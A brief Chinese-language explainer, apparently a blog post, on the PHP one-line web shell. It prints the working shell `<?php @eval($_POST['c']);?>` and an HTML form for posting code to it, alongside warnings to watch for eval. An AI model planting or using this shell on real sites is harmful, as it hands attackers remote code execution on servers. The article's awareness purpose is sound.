這個是php常見的一句話木馬的源碼,通過post木馬程序來實現木馬的植入,eval()函數把字符串按照PHP代碼來計算。該字符串必須是合法的PHP代碼,且必須以分號結尾。如果沒有在代碼字符串中調用return語句,則返回NULL。如果代碼中存在解析錯誤,則eval()函數返回false。
eval可以用來執行任何其他php代碼,所以對於代碼裡發現了eval函數一定要小心,可能是木馬
就這一句話害死人,這樣任何人都可以post任何文件上來,所以要做好防范
?
1
<?php @eval($_POST['c']);?>
使用方法也很簡單,本地提交文件指向提交文件,裡面的php代碼就會被執行
?
1
2
3
4
5
6
7
8
<html>
<body>
<form action="a.php" method="post">
<input type="text" name="c" value="phpinfo();">
<input type="submit" value="submit">
</form>
</body>
</html>
以上所述就是本文的全部內容了,希望大家能夠喜歡。
